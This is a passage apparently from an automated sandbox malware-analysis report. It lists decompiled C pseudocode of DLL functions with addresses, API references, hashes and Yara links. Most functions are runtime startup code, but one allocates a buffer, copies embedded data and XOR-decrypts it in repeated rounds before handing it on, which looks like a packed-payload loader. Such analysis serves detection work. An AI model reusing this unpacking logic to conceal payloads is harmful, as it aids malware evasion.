									_t76 = _t41;
									 *(_t82 - 0x1c) = _t76;
									__eflags = _t76;
									if(_t76 != 0) {
										goto L14;
									}
								}
							} else {
								__eflags = _t72 - 2;
								if(_t72 == 2) {
									goto L12;
								} else {
									_t58 =  *(_t82 + 0x10);
									L14:
									_push(_t58);
									_t42 = E6ED11290(_t58, _t72, _t76, _t89,  *((intOrPtr*)(_t82 + 8)), _t72); // executed
									_t76 = _t42;
									 *(_t82 - 0x1c) = _t76;
									__eflags = _t72 - 1;
									if(_t72 == 1) {
										__eflags = _t76;
										if(_t76 == 0) {
											_push(_t58);
											_t45 = E6ED11290(_t58, _t72, _t76, _t89,  *((intOrPtr*)(_t82 + 8)), _t42);
											__eflags = _t58;
											_t25 = _t58 != 0;
											__eflags = _t25;
											_push((_t45 & 0xffffff00 | _t25) & 0x000000ff);
											E6ED2C8DB(_t58, _t68, _t72, _t76, _t25, _t89);
											_pop(_t61);
											E6ED2CA96( *((intOrPtr*)(_t82 + 8)), _t76, _t58);
										}
									}
									__eflags = _t72;
									if(_t72 == 0) {
										L19:
										_t76 = E6ED2C781(_t61,  *((intOrPtr*)(_t82 + 8)), _t72, _t58);
										 *(_t82 - 0x1c) = _t76;
										__eflags = _t76;
										if(_t76 != 0) {
											_t76 = E6ED2CA96( *((intOrPtr*)(_t82 + 8)), _t72, _t58);
											 *(_t82 - 0x1c) = _t76;
										}
									} else {
										__eflags = _t72 - 3;
										if(_t72 == 3) {
											goto L19;
										}
									}
								}
							}
							 *(_t82 - 4) = 0xfffffffe;
							_t40 = _t76;
						} else {
							__eflags =  *0x6ed6e174 - _t72; // 0x0
							if(__eflags > 0) {
								goto L9;
							} else {
								_t40 = 0;
							}
						}
						 *[fs:0x0] =  *((intOrPtr*)(_t82 - 0x10));
						return _t40;
					} else {
						E6ED2CFFD(__ebx, _t61, 1, __esi);
						E6ED2CEB9();
						E6ED2D31B();
						 *0x6ed6e4b8 =  *0x6ed6e4b8 & 0x00000000;
						 *(_t82 - 4) =  *(_t82 - 4) & 0x00000000;
						E6ED2C970();
						_t54 = E6ED2D19E(_t61,  *((intOrPtr*)(_t82 + 8)), 0);
						asm("sbb esi, esi");
						_t80 =  ~(_t54 & 0x000000ff) & 1;
						__eflags = _t80;
						 *(_t82 - 0x1c) = _t80;
						 *(_t82 - 4) = 0xfffffffe;
						E6ED2C97D();
						_t56 = _t80;
						goto L4;
					}
				} else {
					_t56 = 0;
					L4:
					 *[fs:0x0] =  *((intOrPtr*)(_t82 - 0x10));
					return _t56;
				}
			}

0x6ed2c8db
0x6ed2c8db
0x6ed2c8db
0x6ed2c8dd
0x6ed2c8e2
0x6ed2c8e7
0x6ed2c8ee
0x6ed2c8f5
0x6ed2c8fd
0x6ed2c900
0x6ed2c909
0x6ed2c90c
0x6ed2c90f
0x6ed2c916
0x6ed2c985
0x6ed2c98a
0x6ed2c98b
0x6ed2c98d
0x6ed2c992
0x6ed2c997
0x6ed2c99a
0x6ed2c99c
0x6ed2c9ad
0x6ed2c9ad
0x6ed2c9b1
0x6ed2c9b4
0x6ed2c9c0
0x6ed2c9c0
0x6ed2c9cd
0x6ed2c9cf
0x6ed2c9d2
0x6ed2c9d4
0x6ed2c9df
0x6ed2c9e4
0x6ed2c9e6
0x6ed2c9e9
0x6ed2c9eb
0x00000000
0x00000000
0x6ed2c9eb
0x6ed2c9b6
0x6ed2c9b6
0x6ed2c9b9
0x00000000
0x6ed2c9bb
0x6ed2c9bb
0x6ed2c9f1
0x6ed2c9f1
0x6ed2c9f6
0x6ed2c9fb
0x6ed2c9fd
0x6ed2ca00
0x6ed2ca03
0x6ed2ca05
0x6ed2ca07
0x6ed2ca09
0x6ed2ca0e
0x6ed2ca13
0x6ed2ca15
0x6ed2ca15
0x6ed2ca1b
0x6ed2ca1c
0x6ed2ca21
0x6ed2ca27
0x6ed2ca27
0x6ed2ca07
0x6ed2ca2c
0x6ed2ca2e
0x6ed2ca35
0x6ed2ca3f
0x6ed2ca41
0x6ed2ca44
0x6ed2ca46
0x6ed2ca52
0x6ed2ca7a
0x6ed2ca7a
0x6ed2ca30
0x6ed2ca30
0x6ed2ca33
0x00000000
0x00000000
0x6ed2ca33
0x6ed2ca2e
0x6ed2c9b9
0x6ed2ca7d
0x6ed2ca84
0x6ed2c99e
0x6ed2c99e
0x6ed2c9a4
0x00000000
0x6ed2c9a6
0x6ed2c9a6
0x6ed2c9a6
0x6ed2c9a4
0x6ed2ca89
0x6ed2ca95
0x6ed2c918
0x6ed2c918
0x6ed2c91d
0x6ed2c922
0x6ed2c927
0x6ed2c92e
0x6ed2c932
0x6ed2c93c
0x6ed2c948
0x6ed2c94a
0x6ed2c94a
0x6ed2c94c
0x6ed2c94f
0x6ed2c956
0x6ed2c95b
0x00000000
0x6ed2c95b
0x6ed2c8f0
0x6ed2c8f0
0x6ed2c95d
0x6ed2c960
0x6ed2c96c
0x6ed2c96c

APIs

__RTC_Initialize.LIBCMT ref: 6ED2C922
___scrt_uninitialize_crt.LIBCMT ref: 6ED2C93C

Memory Dump Source

Source File: 00000003.00000002.642548068.000000006ED11000.00000020.00020000.sdmp, Offset: 6ED10000, based on PE: true

Associated: 00000003.00000002.642533398.000000006ED10000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.642617532.000000006ED3A000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.642681588.000000006ED6D000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.642689132.000000006ED6F000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.642695305.000000006ED70000.00000002.00020000.sdmp Download File

Similarity

API ID: Initialize___scrt_uninitialize_crt
String ID:
API String ID: 2442719207-0
Opcode ID: f1acdbcfe2af08627dce4b526b258ad5505f90ab919c3d97c5408dbc00449632
Instruction ID: bf00e9a14408d4c97fe1ef78394aa3515aea44fa4c2ee69c1d4e52c227bef58f
Opcode Fuzzy Hash: f1acdbcfe2af08627dce4b526b258ad5505f90ab919c3d97c5408dbc00449632
Instruction Fuzzy Hash: A1417D72E05625EFDB518FE8CC00BAE7AB8EF85B5DF114525EA146B290C734CD029BB1

Uniqueness

Uniqueness Score: -1.00%

Function 6ED2C98B, Relevance: 7.6, APIs: 5, Instructions: 87
COMMON

Download Yara Rule

C-Code - Quality: 89%

			E6ED2C98B(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
				signed int _t24;
				signed int _t25;
				signed int _t26;
				signed int _t29;
				signed int _t35;
				void* _t37;
				void* _t40;
				signed int _t42;
				signed int _t45;
				void* _t47;
				void* _t52;
				void* _t53;

				_t53 = __fp0;
				_t40 = __edx;
				_push(0xc);
				_push(0x6ed6afa8);
				E6ED2D350(__ebx, __edi, __esi);
				_t42 =  *(_t47 + 0xc);
				if(_t42 != 0) {
					L3:
					 *(_t47 - 4) =  *(_t47 - 4) & 0x00000000;
					__eflags = _t42 - 1;
					if(_t42 == 1) {
						L6:
						_t35 =  *(_t47 + 0x10);
						_t45 = E6ED2CA96( *((intOrPtr*)(_t47 + 8)), _t42, _t35);
						 *(_t47 - 0x1c) = _t45;
						__eflags = _t45;
						if(_t45 == 0) {
							L16:
							 *(_t47 - 4) = 0xfffffffe;
							_t24 = _t45;
							L17:
							 *[fs:0x0] =  *((intOrPtr*)(_t47 - 0x10));
							return _t24;
						}
						_t25 = E6ED2C781(_t37,  *((intOrPtr*)(_t47 + 8)), _t42, _t35); // executed
						_t45 = _t25;
						 *(_t47 - 0x1c) = _t45;
						__eflags = _t45;
						if(_t45 == 0) {
							goto L16;
						}
						L8:
						_push(_t35);
						_t26 = E6ED11290(_t35, _t42, _t45, _t53,  *((intOrPtr*)(_t47 + 8)), _t42); // executed
						_t45 = _t26;
						 *(_t47 - 0x1c) = _t45;
						__eflags = _t42 - 1;
						if(_t42 == 1) {
							__eflags = _t45;
							if(_t45 == 0) {
								_push(_t35);
								_t29 = E6ED11290(_t35, _t42, _t45, _t53,  *((intOrPtr*)(_t47 + 8)), _t26);
								__eflags = _t35;
								_t14 = _t35 != 0;
								__eflags = _t14;
								_push((_t29 & 0xffffff00 | _t14) & 0x000000ff);
								E6ED2C8DB(_t35, _t40, _t42, _t45, _t14, _t53);
								_pop(_t37);
								E6ED2CA96( *((intOrPtr*)(_t47 + 8)), _t45, _t35);
							}
						}
						__eflags = _t42;
						if(_t42 == 0) {
							L13:
							_t45 = E6ED2C781(_t37,  *((intOrPtr*)(_t47 + 8)), _t42, _t35);
							 *(_t47 - 0x1c) = _t45;
							__eflags = _t45;
							if(_t45 != 0) {
								_t45 = E6ED2CA96( *((intOrPtr*)(_t47 + 8)), _t42, _t35);
								 *(_t47 - 0x1c) = _t45;
							}
							goto L16;
						} else {
							__eflags = _t42 - 3;
							if(_t42 != 3) {
								goto L16;
							}
							goto L13;
						}
					}
					__eflags = _t42 - 2;
					if(_t42 == 2) {
						goto L6;
					}
					_t35 =  *(_t47 + 0x10);
					goto L8;
				}
				_t52 =  *0x6ed6e174 - _t42; // 0x0
				if(_t52 > 0) {
					goto L3;
				}
				_t24 = 0;
				goto L17;
			}

0x6ed2c98b
0x6ed2c98b
0x6ed2c98b
0x6ed2c98d
0x6ed2c992
0x6ed2c997
0x6ed2c99c
0x6ed2c9ad
0x6ed2c9ad
0x6ed2c9b1
0x6ed2c9b4
0x6ed2c9c0
0x6ed2c9c0
0x6ed2c9cd
0x6ed2c9cf
0x6ed2c9d2
0x6ed2c9d4
0x6ed2ca7d
0x6ed2ca7d
0x6ed2ca84
0x6ed2ca86
0x6ed2ca89
0x6ed2ca95
0x6ed2ca95
0x6ed2c9df
0x6ed2c9e4
0x6ed2c9e6
0x6ed2c9e9
0x6ed2c9eb
0x00000000
0x00000000
0x6ed2c9f1
0x6ed2c9f1
0x6ed2c9f6
0x6ed2c9fb
0x6ed2c9fd
0x6ed2ca00
0x6ed2ca03
0x6ed2ca05
0x6ed2ca07
0x6ed2ca09
0x6ed2ca0e
0x6ed2ca13
0x6ed2ca15
0x6ed2ca15
0x6ed2ca1b
0x6ed2ca1c
0x6ed2ca21
0x6ed2ca27
0x6ed2ca27
0x6ed2ca07
0x6ed2ca2c
0x6ed2ca2e
0x6ed2ca35
0x6ed2ca3f
0x6ed2ca41
0x6ed2ca44
0x6ed2ca46
0x6ed2ca52
0x6ed2ca7a
0x6ed2ca7a
0x00000000
0x6ed2ca30
0x6ed2ca30
0x6ed2ca33
0x00000000
0x00000000
0x00000000
0x6ed2ca33
0x6ed2ca2e
0x6ed2c9b6
0x6ed2c9b9
0x00000000
0x00000000
0x6ed2c9bb
0x00000000
0x6ed2c9bb
0x6ed2c99e
0x6ed2c9a4
0x00000000
0x00000000
0x6ed2c9a6
0x00000000

APIs

dllmain_raw.LIBCMT ref: 6ED2C9C8
dllmain_crt_dispatch.LIBCMT ref: 6ED2C9DF
dllmain_raw.LIBCMT ref: 6ED2CA27
dllmain_crt_dispatch.LIBCMT ref: 6ED2CA3A
dllmain_raw.LIBCMT ref: 6ED2CA4D

Memory Dump Source

Source File: 00000003.00000002.642548068.000000006ED11000.00000020.00020000.sdmp, Offset: 6ED10000, based on PE: true

Associated: 00000003.00000002.642533398.000000006ED10000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.642617532.000000006ED3A000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.642681588.000000006ED6D000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.642689132.000000006ED6F000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.642695305.000000006ED70000.00000002.00020000.sdmp Download File

Similarity

API ID: dllmain_raw$dllmain_crt_dispatch
String ID:
API String ID: 3136044242-0
Opcode ID: 7b8d1310531eeb3815f3f36808779071d927ba3d8ff118c5a7d1d622fc8419f6
Instruction ID: 1d3e2dac8d8de50ddf9d329b217b75a7a9745da20d8b5e9ce425dacbd8391e22
Opcode Fuzzy Hash: 7b8d1310531eeb3815f3f36808779071d927ba3d8ff118c5a7d1d622fc8419f6
Instruction Fuzzy Hash: 17212C72E05669EFDB618BA9CC40AAE3A69EB85B9CF014535FA146F250D730CD418BA0

Uniqueness

Uniqueness Score: -1.00%

Function 6ED1C2A0, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 9
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6ED1C2A0() {
				struct HINSTANCE__* _t1;

				_t1 = GetModuleHandleA("api-ms-win-core-synch-l1-2-0"); // executed
				if(_t1 == 0) {
					return _t1;
				} else {
					return GetProcAddress(_t1, "WakeByAddressSingle");
				}
			}

0x6ed1c2a5
0x6ed1c2ad
0x6ed1c2bc
0x6ed1c2af
0x6ed1c2bb
0x6ed1c2bb

APIs

GetModuleHandleA.KERNEL32(api-ms-win-core-synch-l1-2-0), ref: 6ED1C2A5
GetProcAddress.KERNEL32(00000000,WakeByAddressSingle), ref: 6ED1C2B5

Strings

api-ms-win-core-synch-l1-2-0, xrefs: 6ED1C2A0
WakeByAddressSingle, xrefs: 6ED1C2AF

Memory Dump Source

Source File: 00000003.00000002.642548068.000000006ED11000.00000020.00020000.sdmp, Offset: 6ED10000, based on PE: true

Associated: 00000003.00000002.642533398.000000006ED10000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.642617532.000000006ED3A000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.642681588.000000006ED6D000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.642689132.000000006ED6F000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.642695305.000000006ED70000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressHandleModuleProc
String ID: WakeByAddressSingle$api-ms-win-core-synch-l1-2-0
API String ID: 1646373207-1731903895
Opcode ID: d01959ced64a159f238ee7bafd65af4daa22557c1e59122427a95e1221248668
Instruction ID: 5725c4016c09d37a9390e4c2a7f7b650b532d9b84cdfdb4e0354cacbd6cff95d
Opcode Fuzzy Hash: d01959ced64a159f238ee7bafd65af4daa22557c1e59122427a95e1221248668
Instruction Fuzzy Hash: 66B092B4F08501ABAEB0ABF24A0CB863B98A9922827000454A511EE208EA24C40ADA22

Uniqueness

Uniqueness Score: -1.00%

Function 6ED1C320, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 9
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6ED1C320() {
				struct HINSTANCE__* _t1;

				_t1 = GetModuleHandleA("api-ms-win-core-synch-l1-2-0"); // executed
				if(_t1 == 0) {
					return _t1;
				} else {
					return GetProcAddress(_t1, "WaitOnAddress");
				}
			}

0x6ed1c325
0x6ed1c32d
0x6ed1c33c
0x6ed1c32f
0x6ed1c33b
0x6ed1c33b

APIs

GetModuleHandleA.KERNEL32(api-ms-win-core-synch-l1-2-0), ref: 6ED1C325
GetProcAddress.KERNEL32(00000000,WaitOnAddress), ref: 6ED1C335

Strings

WaitOnAddress, xrefs: 6ED1C32F
api-ms-win-core-synch-l1-2-0, xrefs: 6ED1C320

Memory Dump Source

Source File: 00000003.00000002.642548068.000000006ED11000.00000020.00020000.sdmp, Offset: 6ED10000, based on PE: true

Associated: 00000003.00000002.642533398.000000006ED10000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.642617532.000000006ED3A000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.642681588.000000006ED6D000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.642689132.000000006ED6F000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.642695305.000000006ED70000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressHandleModuleProc
String ID: WaitOnAddress$api-ms-win-core-synch-l1-2-0
API String ID: 1646373207-1891578837
Opcode ID: 56d26acc9feb726eff11ad0a9cad2074358236156d4bd33465b12236bd7e0505
Instruction ID: d334e97be1575e5839dc7c7f389c1ab97af7c88958f05cbc237d79f203e10960
Opcode Fuzzy Hash: 56d26acc9feb726eff11ad0a9cad2074358236156d4bd33465b12236bd7e0505
Instruction Fuzzy Hash: C3B092B4F04501A7AE70ABF25A0CA862A58A96228270004606016DD219EA24C005D921

Uniqueness

Uniqueness Score: -1.00%

Function 6ED34161, Relevance: 6.1, APIs: 4, Instructions: 74
COMMON

Download Yara Rule

C-Code - Quality: 19%

			E6ED34161() {
				intOrPtr _v8;
				signed int _v12;
				WCHAR* _t5;
				void* _t6;
				intOrPtr _t9;
				WCHAR* _t10;
				WCHAR* _t19;
				WCHAR* _t26;
				WCHAR* _t29;

				_push(_t21);
				_t5 = GetEnvironmentStringsW();
				_t29 = _t5;
				if(_t29 != 0) {
					_t6 = E6ED3412A(_t29);
					_t19 = 0;
					_v12 = _t6 - _t29 >> 1;
					_t9 = E6ED34073(0, 0, _t29, _t6 - _t29 >> 1, 0, 0, 0, 0);
					_v8 = _t9;
					if(_t9 != 0) {
						_t10 = E6ED322E9(_t9); // executed
						_t26 = _t10;
						_push(0);
						if(_t26 != 0) {
							_push(0);
							_push(_v8);
							_push(_t26);
							_push(_v12);
							_push(_t29);
							_push(0);
							_push(0);
							if(E6ED34073() != 0) {
								E6ED32C83(0);
								_t19 = _t26;
							} else {
								E6ED32C83(_t26);
							}
							FreeEnvironmentStringsW(_t29);
							_t5 = _t19;
						} else {
							E6ED32C83();
							FreeEnvironmentStringsW(_t29);
							_t5 = 0;
						}
					} else {
						FreeEnvironmentStringsW(_t29);
						_t5 = 0;
					}
				}
				return _t5;
			}

0x6ed34167
0x6ed34169
0x6ed3416f
0x6ed34173
0x6ed3417b
0x6ed34180
0x6ed3418e
0x6ed34191
0x6ed34199
0x6ed3419e
0x6ed341ad
0x6ed341b2
0x6ed341b5
0x6ed341b8
0x6ed341cb
0x6ed341cc
0x6ed341cf
0x6ed341d0
0x6ed341d3
0x6ed341d4
0x6ed341d5
0x6ed341e0
0x6ed341eb
0x6ed341f0
0x6ed341e2
0x6ed341e3
0x6ed341e3
0x6ed341f4
0x6ed341fa
0x6ed341ba
0x6ed341ba
0x6ed341c1
0x6ed341c7
0x6ed341c7
0x6ed341a0
0x6ed341a1
0x6ed341a7
0x6ed341a7
0x6ed341fd
0x6ed34200

APIs

GetEnvironmentStringsW.KERNEL32 ref: 6ED34169

Part of subcall function 6ED34073: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,6ED361E2,?,00000000,-00000008), ref: 6ED3411F

FreeEnvironmentStringsW.KERNEL32(00000000), ref: 6ED341A1
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 6ED341C1

Memory Dump Source

Source File: 00000003.00000002.642548068.000000006ED11000.00000020.00020000.sdmp, Offset: 6ED10000, based on PE: true

Associated: 00000003.00000002.642533398.000000006ED10000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.642617532.000000006ED3A000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.642681588.000000006ED6D000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.642689132.000000006ED6F000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.642695305.000000006ED70000.00000002.00020000.sdmp Download File

Similarity

API ID: EnvironmentStrings$Free$ByteCharMultiWide
String ID:
API String ID: 158306478-0
Opcode ID: 29caf1f13d4bbff6d1f9d82fa9481067fb29315fa14cbc525a14447b6878a678
Instruction ID: 7ddb0a2767b2aa5e839666aa0c7c6379a7fac73ea90e93d7fdfb8aced8918e80
Opcode Fuzzy Hash: 29caf1f13d4bbff6d1f9d82fa9481067fb29315fa14cbc525a14447b6878a678
Instruction Fuzzy Hash: 6D11A1A2A05E36BE6A1117F69C89CAF6A6CDE572983204915F401D2181EB6ACD0381B1

Uniqueness

Uniqueness Score: -1.00%

Function 6ED11290, Relevance: 3.9, APIs: 3, Instructions: 137
memoryCOMMON

Download Yara Rule

C-Code - Quality: 73%

			E6ED11290(void* __ebx, void* __edi, void* __esi, void* __fp0, void* _a4, intOrPtr _a8) {
				void* _v16;
				intOrPtr _v112;
				void* __ebp;
				void* _t53;
				void* _t56;
				void* _t57;
				void* _t61;
				unsigned int _t62;
				signed char _t66;
				void* _t68;
				signed int _t69;
				unsigned int _t82;
				void* _t83;
				void** _t87;
				signed int _t88;
				void* _t102;
				void* _t103;
				void** _t105;
				void* _t108;
				signed int _t110;
				void* _t112;

				_t100 = __edi;
				_t80 = __ebx;
				_push(__ebx);
				_push(__edi);
				_t112 = (_t110 & 0xfffffff0) - 0x70;
				_t105 = _t112;
				_t105[0x16] = _t108;
				_t105[0x17] = _t112;
				_t105[0x1a] = 0xffffffff;
				_t105[0x19] = E6ED23960;
				_t118 = _a8 - 1;
				_t105[0x18] =  *[fs:0x0];
				 *[fs:0x0] =  &(_t105[0x18]);
				if(_a8 != 1) {
					L14:
					_t53 = _t105[0x18];
					 *[fs:0x0] = _t53;
					return _t53;
				} else {
					asm("movaps xmm1, [0x6ed3a1d0]");
					asm("xorps xmm0, xmm0");
					asm("movaps [esi+0x30], xmm0");
					_t105[0x10] = _a4;
					_t105[0x11] = 0;
					asm("movups [esi+0x48], xmm1");
					E6ED2BE60(_t118, __fp0);
					asm("movaps xmm0, [0x6ed3a1e0]");
					_t105[2] = 0x4c6ed62a;
					_t105[3] = 0xd41b180a;
					_t105[4] = 0xe69c857c;
					_t105[5] = 0x15d8;
					asm("movups [esi+0x18], xmm0");
					_t105[0xa] = 0x5c3fff75;
					_t105[0xb] = 0x207661e;
					_t56 =  *0x6ed6e128; // 0x810000
					if(_t56 != 0) {
						L4:
						_t57 = HeapAlloc(_t56, 0, 0x23800); // executed
						if(_t57 == 0) {
							goto L15;
						} else {
							 *_t105 = _t57;
							E6ED2D4D0(_t57, 0x6ed3a230, 0x23800);
							_t61 = 0;
							asm("o16 nop [cs:eax+eax]");
							do {
								_t102 = 0xfffdc800;
								_t87 =  &(_t105[2]);
								_t82 = 0;
								_t105[1] = _t61;
								do {
									_t62 = _t82;
									_t82 = _t82 + 1;
									_t66 =  *(_t87 + ((_t62 >> 1) * 0x92492493 >> 0x20 >> 2) * 0xfffffff2) & 0x000000ff;
									_t87 =  &(_t87[0]);
									 *( *_t105 + _t102 + 0x23800) =  *( *_t105 + _t102 + 0x23800) ^ _t66;
									_t102 = _t102 + 1;
								} while (_t102 != 0);
								_t61 = _t105[1] + 1;
							} while (_t61 != 0x3e9);
							_t83 =  *_t105;
							_t68 = 0;
							asm("o16 nop [cs:eax+eax]");
							do {
								_t103 = 0xfffdc800;
								_t88 = 0;
								_t105[1] = _t68;
								asm("o16 nop [eax+eax]");
								do {
									_t69 = _t88;
									_t88 = _t88 + 1;
									 *(_t83 + _t103 + 0x23800) =  *(_t83 + _t103 + 0x23800) ^  *(_t103 + _t105 +  ~((_t69 * 0xaaaaaaab >> 0x00000020 >> 0x00000001 & 0xfffffff8) + 0xffffffff55555556) + 0x18 + 0x23800) & 0x000000ff;
									_t103 = _t103 + 1;
								} while (_t103 != 0);
								_t68 = _t105[1] + 1;
								_t128 = _t68 - 0x3e9;
							} while (_t68 != 0x3e9);
							_t105[0x1a] = 0;
							_t105[0xc] =  *_t105;
							_push( &(_t105[0xc]));
							E6ED2C050(_t128);
							HeapFree( *0x6ed6e128, 0,  *_t105);
							goto L14;
						}
					} else {
						_t56 = GetProcessHeap();
						if(_t56 == 0) {
							L15:
							E6ED392F0(_t80, 0x23800, 1, _t100, _t105, __eflags);
							asm("ud2");
							_push(_t108);
							return E6ED11000(_v112, 0x23800);
						} else {
							 *0x6ed6e128 = _t56;
							goto L4;
						}
					}
				}
			}

0x6ed11290
0x6ed11290
0x6ed11293
0x6ed11294
0x6ed11299
0x6ed1129c
0x6ed1129e
0x6ed112a4
0x6ed112a7
0x6ed112ae
0x6ed112bf
0x6ed112c2
0x6ed112c5
0x6ed112cc
0x6ed1143c
0x6ed1143c
0x6ed1143f
0x6ed1144c
0x6ed112d2
0x6ed112d5
0x6ed112dc
0x6ed112df
0x6ed112e3
0x6ed112e6
0x6ed112ed
0x6ed112f1
0x6ed112f6
0x6ed112fd
0x6ed11304
0x6ed1130b
0x6ed11312
0x6ed11318
0x6ed1131c
0x6ed11323
0x6ed1132a
0x6ed11331
0x6ed11345
0x6ed1134d
0x6ed11354
0x00000000
0x6ed1135a
0x6ed11364
0x6ed11367
0x6ed1136f
0x6ed11371
0x6ed11380
0x6ed11380
0x6ed11385
0x6ed11388
0x6ed1138a
0x6ed11390
0x6ed11390
0x6ed11397
0x6ed113a4
0x6ed113a8
0x6ed113a9
0x6ed113b0
0x6ed113b0
0x6ed113b6
0x6ed113b7
0x6ed113be
0x6ed113c0
0x6ed113c2
0x6ed113d0
0x6ed113d0
0x6ed113d5
0x6ed113d7
0x6ed113da
0x6ed113e0
0x6ed113e0
0x6ed113e7
0x6ed11400
0x6ed11407
0x6ed11407
0x6ed1140d
0x6ed1140e
0x6ed1140e
0x6ed11417
0x6ed1141e
0x6ed11424
0x6ed11425
0x6ed11437
0x00000000
0x6ed11437
0x6ed11333
0x6ed11333
0x6ed1133a
0x6ed1144f
0x6ed11459
0x6ed1145e
0x6ed11460
0x6ed1147a
0x6ed11340
0x6ed11340
0x00000000
0x6ed11340
0x6ed1133a
0x6ed11331

APIs

Part of subcall function 6ED2BE60: GetTickCount64.KERNEL32 ref: 6ED2BE96
Part of subcall function 6ED2BE60: GetTickCount64.KERNEL32 ref: 6ED2BEB4
Part of subcall function 6ED2BE60: GetTickCount64.KERNEL32 ref: 6ED2BECD
Part of subcall function 6ED2BE60: GetTickCount64.KERNEL32 ref: 6ED2BECF
Part of subcall function 6ED2BE60: GetTickCount64.KERNEL32 ref: 6ED2BED6
Part of subcall function 6ED2BE60: GetTickCount64.KERNEL32 ref: 6ED2BEF4

GetProcessHeap.KERNEL32 ref: 6ED11333
HeapAlloc.KERNEL32(00810000,00000000,00023800), ref: 6ED1134D
HeapFree.KERNEL32(00000000), ref: 6ED11437

Memory Dump Source

Source File: 00000003.00000002.642548068.000000006ED11000.00000020.00020000.sdmp, Offset: 6ED10000, based on PE: true

Associated: 00000003.00000002.642533398.000000006ED10000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.642617532.000000006ED3A000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.642681588.000000006ED6D000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.642689132.000000006ED6F000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.642695305.000000006ED70000.00000002.00020000.sdmp Download File

Similarity

API ID: Count64Tick$Heap$AllocFreeProcess
String ID:
API String ID: 2047189075-0
Opcode ID: 2a95a6a57b865bf62c86f9a8f3d144e23c12864f90779f53f1ce3cd69a29f984
Instruction ID: 76de100a225993ec88870508900bf8faa4ee989821f236b8da901f5ca8eae16c
Opcode Fuzzy Hash: 2a95a6a57b865bf62c86f9a8f3d144e23c12864f90779f53f1ce3cd69a29f984
Instruction Fuzzy Hash: 6051BE74A04B408FD320CF69D940A96BBF4FF59318F108A2DE9D68BA95D734F545CB90

Uniqueness

Uniqueness Score: -1.00%

Function 6ED2C7D4, Relevance: 3.1, APIs: 2, Instructions: 76
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E6ED2C7D4(void* __ebx, void* __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, void* __eflags, void* __fp0) {
				void* _t43;
				char _t44;
				signed int _t48;
				signed int _t54;
				signed int _t55;
				signed int _t56;
				signed int _t59;
				signed char _t67;
				signed int _t69;
				void* _t80;
				signed int _t86;
				void* _t90;
				void* _t102;
				signed int _t110;
				signed int _t115;
				signed int _t119;
				intOrPtr* _t121;
				void* _t123;
				void* _t140;

				_t140 = __fp0;
				_t113 = __esi;
				_t106 = __edi;
				_t105 = __edx;
				_push(0x10);
				E6ED2D350(__ebx, __edi, __esi);
				_t43 = E6ED2D02D(__ecx, __edx, 0); // executed
				_t90 = 0x6ed6af60;
				if(_t43 == 0) {
					L11:
					_t44 = 0;
					__eflags = 0;
					goto L12;
				} else {
					 *((char*)(_t123 - 0x1d)) = E6ED2CF32();
					_t85 = 1;
					 *((char*)(_t123 - 0x19)) = 1;
					 *(_t123 - 4) =  *(_t123 - 4) & 0x00000000;
					_t132 =  *0x6ed6e4b8;
					if( *0x6ed6e4b8 != 0) {
						E6ED2D1CC(_t105, __edi, __esi, 7);
						asm("int3");
						_push(0x10);
						_push(0x6ed6af80);
						E6ED2D350(1, __edi, __esi);
						_t48 =  *0x6ed6e174; // 0x0
						__eflags = _t48;
						if(_t48 > 0) {
							 *0x6ed6e174 = _t48 - 1;
							 *(_t123 - 0x1c) = 1;
							 *(_t123 - 4) =  *(_t123 - 4) & 0x00000000;
							 *((char*)(_t123 - 0x20)) = E6ED2CF32();
							 *(_t123 - 4) = 1;
							__eflags =  *0x6ed6e4b8 - 2;
							if( *0x6ed6e4b8 != 2) {
								E6ED2D1CC(_t105, 1, _t113, 7);
								asm("int3");
								_push(0xc);
								_push(0x6ed6afa8);
								E6ED2D350(1, 1, _t113);
								_t110 =  *(_t123 + 0xc);
								__eflags = _t110;
								if(_t110 != 0) {
									L23:
									 *(_t123 - 4) =  *(_t123 - 4) & 0x00000000;
									__eflags = _t110 - 1;
									if(_t110 == 1) {
										L26:
										_t86 =  *(_t123 + 0x10);
										_t115 = E6ED2CA96( *((intOrPtr*)(_t123 + 8)), _t110, _t86);
										 *(_t123 - 0x1c) = _t115;
										__eflags = _t115;
										if(_t115 != 0) {
											_t55 = E6ED2C781(_t90,  *((intOrPtr*)(_t123 + 8)), _t110, _t86); // executed
											_t115 = _t55;
											 *(_t123 - 0x1c) = _t115;
											__eflags = _t115;
											if(_t115 != 0) {
												goto L28;
											}
										}
									} else {
										__eflags = _t110 - 2;
										if(_t110 == 2) {
											goto L26;
										} else {
											_t86 =  *(_t123 + 0x10);
											L28:
